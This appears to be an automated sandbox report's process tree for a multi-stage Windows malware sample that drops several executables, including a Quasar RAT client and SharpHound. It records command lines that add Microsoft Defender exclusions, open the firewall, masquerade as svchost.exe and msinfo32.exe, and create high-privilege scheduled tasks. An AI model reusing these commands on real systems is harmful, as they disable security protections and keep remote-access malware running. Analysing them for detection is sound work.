        Scheduled Task/Job: Scheduled Task
        
        PID:6048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\J15xKitpPbqd.bat" "
        15⤵
        
        PID:4720
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:5808
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3080
        
        C:\Windows\system32\dll32\msinfo32.exe
        
        "C:\Windows\system32\dll32\msinfo32.exe"
        16⤵
        
        PID:6048
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
        17⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9wzkq6jtFNQ0.bat" "
        17⤵
        
        PID:5828
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:1964
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:956
        
        C:\Windows\system32\dll32\msinfo32.exe
        
        "C:\Windows\system32\dll32\msinfo32.exe"
        18⤵
        
        PID:5252
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
        19⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\I1cby2j4igRX.bat" "
        19⤵
        
        PID:4868
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:5436
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5444
        
        C:\Windows\system32\dll32\msinfo32.exe
        
        "C:\Windows\system32\dll32\msinfo32.exe"
        20⤵
        
        PID:1280
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
        21⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\U4iJ6j2lQloH.bat" "
        21⤵
        
        PID:5344
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        22⤵
        
        PID:5820
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:6068
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2256
        
        C:\Windows\system32\dll32\msinfo32.exe
        
        "C:\Windows\system32\dll32\msinfo32.exe"
        22⤵
        
        PID:4120
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
        23⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1kj4pTejnGH6.bat" "
        23⤵
        
        PID:3356
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:4752
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2396
        
        C:\Windows\system32\dll32\msinfo32.exe
        
        "C:\Windows\system32\dll32\msinfo32.exe"
        24⤵
        
        PID:4344
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
        25⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1932
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ll6idhQmDBeo.bat" "
        25⤵
        
        PID:4560
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:4756
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6548
        
        C:\Windows\system32\dll32\msinfo32.exe
        
        "C:\Windows\system32\dll32\msinfo32.exe"
        26⤵
        
        PID:5584
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
        27⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2ewxncSsaNuO.bat" "
        27⤵
        
        PID:6576
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        28⤵
        
        PID:6868
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6652
    - - C:\Users\Admin\AppData\Local\Temp\a\Network.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\Network.exe"
        5⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetWindowsHookEx
        
        PID:3916
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Network.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5404
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5580
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Network.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5728
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Network" /tr "C:\Users\Admin\AppData\Roaming\Network.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6016
    - - C:\Users\Admin\AppData\Local\Temp\a\rea.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\rea.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:2620
      - \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe"
        6⤵
        
        PID:5088
    - - C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Checks whether UAC is enabled
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:2404
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /f /tn "WAN Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmpF1C2.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5168
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /f /tn "WAN Service Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpF2AE.tmp"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5240
    - - C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"
        5⤵
        Executes dropped EXE
        
        PID:5172
    - - C:\Users\Admin\AppData\Local\Temp\a\mod.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\mod.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5284
    - - C:\Users\Admin\AppData\Local\Temp\a\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\Server.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3668
      - C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:5500
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3296
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        7⤵
        
        PID:5812
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        8⤵
        
        PID:6068
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        9⤵
        Modifies Windows Firewall
        
        PID:5456
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        9⤵
        
        PID:5756
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        10⤵
        
        PID:2396
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        11⤵
        Modifies Windows Firewall
        
        PID:5732
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        11⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        12⤵
        
        PID:5532
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        13⤵
        Modifies Windows Firewall
        
        PID:5496
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        13⤵
        
        PID:5528
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        14⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        15⤵
        Modifies Windows Firewall
        
        PID:5072
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        15⤵
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        16⤵
        
        PID:5208
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        17⤵
        Modifies Windows Firewall
        
        PID:564
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        17⤵
        
        PID:5412
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        18⤵
        
        PID:2884
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        19⤵
        Modifies Windows Firewall
        
        PID:4756
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        19⤵
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        20⤵
        
        PID:3296
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        21⤵
        Modifies Windows Firewall
        
        PID:3728
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        21⤵
        
        PID:5884
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        22⤵
        
        PID:5204
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        23⤵
        Modifies Windows Firewall
        
        PID:4980
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        23⤵
        
        PID:4184
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        24⤵
        
        PID:3876
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        25⤵
        Modifies Windows Firewall
        
        PID:916
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        25⤵
        
        PID:5644
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        26⤵
        
        PID:2908
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        27⤵
        Modifies Windows Firewall
        
        PID:5272
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        27⤵
        
        PID:32
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        28⤵
        
        PID:1884
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        29⤵
        Modifies Windows Firewall
        
        PID:388
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        29⤵
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        30⤵
        
        PID:5620
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        31⤵
        Modifies Windows Firewall
        
        PID:5808
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        31⤵
        
        PID:6396
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        32⤵
        
        PID:6632
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        33⤵
        Modifies Windows Firewall
        
        PID:6836
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        33⤵
        
        PID:2840
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        34⤵
        
        PID:6228
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        35⤵
        Modifies Windows Firewall
        
        PID:7092
    - - C:\Users\Admin\AppData\Local\Temp\a\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\Client.exe"
        5⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:5764
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6096
      - C:\Windows\system32\Windows Shell Interactive.exe
        
        "C:\Windows\system32\Windows Shell Interactive.exe"
        6⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:1784
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4624
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pYjYvn5tI2bC.bat" "
        7⤵
        
        PID:5568
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:5732
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6104
        
        C:\Windows\system32\Windows Shell Interactive.exe
        
        "C:\Windows\system32\Windows Shell Interactive.exe"
        8⤵
        
        PID:5660
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4Y4sBbAK2Iay.bat" "
        9⤵
        
        PID:4708
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:5252
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5536
        
        C:\Windows\system32\Windows Shell Interactive.exe
        
        "C:\Windows\system32\Windows Shell Interactive.exe"
        10⤵
        
        PID:6096
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5308
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cTeHmVuArX7j.bat" "
        11⤵
        
        PID:1536
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:5408
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4852
        
        C:\Windows\system32\Windows Shell Interactive.exe
        
        "C:\Windows\system32\Windows Shell Interactive.exe"
        12⤵
        
        PID:388
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\STkbwjQU3nJC.bat" "
        13⤵
        
        PID:3188
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:5488
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3256
        
        C:\Windows\system32\Windows Shell Interactive.exe
        
        "C:\Windows\system32\Windows Shell Interactive.exe"
        14⤵
        
        PID:5128
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\R1hnPVJFkFhR.bat" "
        15⤵
        
        PID:5716
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:5776
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5508
        
        C:\Windows\system32\Windows Shell Interactive.exe
        
        "C:\Windows\system32\Windows Shell Interactive.exe"
        16⤵
        
        PID:2732
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
        17⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5352
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Pr3EIpxvYrSj.bat" "
        17⤵
        
        PID:548
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:3544
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5784
        
        C:\Windows\system32\Windows Shell Interactive.exe
        
        "C:\Windows\system32\Windows Shell Interactive.exe"
        18⤵
        
        PID:4108
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
        19⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5860
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AJ30T8jaWOSg.bat" "
        19⤵
        
        PID:2228
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:5508
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1100
        
        C:\Windows\system32\Windows Shell Interactive.exe
        
        "C:\Windows\system32\Windows Shell Interactive.exe"
        20⤵
        
        PID:1968
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
        21⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rRT0VhWq6BCO.bat" "
        21⤵
        
        PID:4776
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:3948
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2644
        
        C:\Windows\system32\Windows Shell Interactive.exe
        
        "C:\Windows\system32\Windows Shell Interactive.exe"
        22⤵
        
        PID:1116
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
        23⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sbt3RCPfnVaU.bat" "
        23⤵
        
        PID:5760
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:6248
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6616
        
        C:\Windows\system32\Windows Shell Interactive.exe
        
        "C:\Windows\system32\Windows Shell Interactive.exe"
        24⤵
        
        PID:6156
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
        25⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1ep3FYeec4t1.bat" "
        25⤵
        
        PID:6532
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:5632
    - - C:\Users\Admin\AppData\Local\Temp\a\jij.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\jij.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Checks whether UAC is enabled
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:6020
    - - C:\Users\Admin\AppData\Local\Temp\a\333.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\333.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5268
    - - C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe"
        5⤵
        
        PID:2808
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2508
      - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        6⤵
        
        PID:5028
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iTPks6k2P1G3.bat" "
        7⤵
        
        PID:5392
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:2064
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4796
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        8⤵
        
        PID:1444
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PVFykXaqQZRP.bat" "
        9⤵
        
        PID:5848
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:4720
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3000
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        10⤵
        
        PID:1644
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wYh2pXctrA5S.bat" "
        11⤵
        
        PID:6360
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:6524
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6740
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        12⤵
